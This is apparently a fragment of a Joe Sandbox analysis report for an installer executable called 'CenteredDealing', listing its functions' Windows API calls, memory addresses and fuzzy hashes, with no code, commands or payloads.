                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                                                                                                                                                                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                • Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                                                                                                                                                                                                                • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                • String ID: Version
                                                                                                                                                                                                                                                                • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                                                                                                                • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                • String ID: !N~
                                                                                                                                                                                                                                                                • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 00405C48
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                • String ID: Error launching installer
                                                                                                                                                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                  • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: Sleep(9732)
                                                                                                                                                                                                                                                                • API String ID: 3509786178-2152357448
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                                                                                                                                                                                                • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 190613189-0